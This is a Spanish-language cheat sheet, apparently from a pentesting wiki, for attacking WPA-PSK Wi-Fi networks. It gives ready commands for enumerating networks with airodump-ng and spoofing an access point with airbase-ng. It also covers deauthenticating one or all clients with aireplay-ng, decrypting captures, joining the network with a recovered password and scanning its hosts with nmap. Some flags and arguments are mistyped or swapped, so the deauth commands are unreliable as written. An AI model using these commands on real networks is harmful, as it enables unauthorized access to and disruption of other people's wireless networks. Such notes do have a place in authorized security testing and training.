Comment on page
Redes PSK
Redes WPA-TKIP o WPA-CCMP
- Para enumerar todas las redes a tu alrededor
airodump-ng -band abg [wlan0mon]
- Para limitar la enumeración a un ESSID y guardar el resultado
airodump-ng -band abg [wlan0mon] --esid [ESSID] -w outputFile
- Para limitar la enumeración a varios ESSIDs y guardar el resultado
airodump-ng --band abg [wlan0mon] --essid-regex 'ESSID1|ESSID2|ESSID3' -w outputFile
- Para enumerar las redes de canales determinados
airodump-ng -band abg -c [44,60,11] [wlan0mon]
- Para enumerar los fabricantes de los puntos de acceso
airodump-ng -band abg [wlan0mon] --manufacturer
- Para ver los APs disponibles en el entorno
iwlist [wlan0] scan | grep [ESSID] -i
Para suplantar la red necesitamos 2 terminales:
Terminal 1 -> Escanea los AP cercanos con el BSSID a suplantar
airodump-ng --band abg [wlan0mon] --essid [ESSID]
Terminal 2 -> Levanta un AP con el nombre de la red (BSSID) a suplantar con nuestra MAC
airbase-ng -e [ESSID] -v [wlan0mon]
- Escaneo de las redes
airodump-ng -c [canal] --essid [ESSID] [wlan0mon]
- Desautenticación de un cliente de la red
aireplay-ng -0 0 --essid [ESSID] -c [APDeLaRedVictima] -a [MACDelClienteADesautenticar] [wlan0mon]
- Desautenticación de todos los cliente de la red
aireplay-ng -0 0 --essid [ESSID] -c [APDeLaRedVictima] [wlan0mon]
airdecap-ng [fichero.cap] -p [password] -e [ESSID]
Una vez tenemos la contraseña de la red, para autenticarnos podemos generar el fichero "wpa_supplicant_ESSID.conf"
En este fichero necesitamos el hash PSK, que lo generamos con wpa_passphrase
echo "wpa_passphrase [ESSID] [password]" > wpa_supplicant_ESSID.conf
Y obtendremos algo como:
network={
ssid="MYSSID"
#psk="passphrase"
psk=4930a14b99a5884d2bbfa0fe7c3210bf6da8eb5788a0ec69a7507c5f0328a096
}
Con este resultado podremos conectarnos a la red (con la interfaz en modo managed)
wpa_supplicant -c [wpa_supplicant_ESSID.conf] -i [wlan1]
Una vez lanzado este comando, debemos leer los EVENT-SCAN-RESULTS para analizar los posibles fallos en la conexión (CTRL-EVENT-SCAN-FAILED).
Cuanto veamos EVENT-SCAN-CONNECTED habremos conseguido conectarnos a la red.
Una vez conectados debemos solicitar una dirección IP al DHCP.
dhclient [wlan1] -v
Cuando tenemos asignada una dirección IP en la red podemos saber el rango que tiene la red, lo que nos permite escanearla en busca de dispositivos conectados.
nmap -Pn IP/rango
En los resultados que obtengamos podemos realizar nmaps que nos den más detalles de los servicios expuestos.
Last modified 26d ago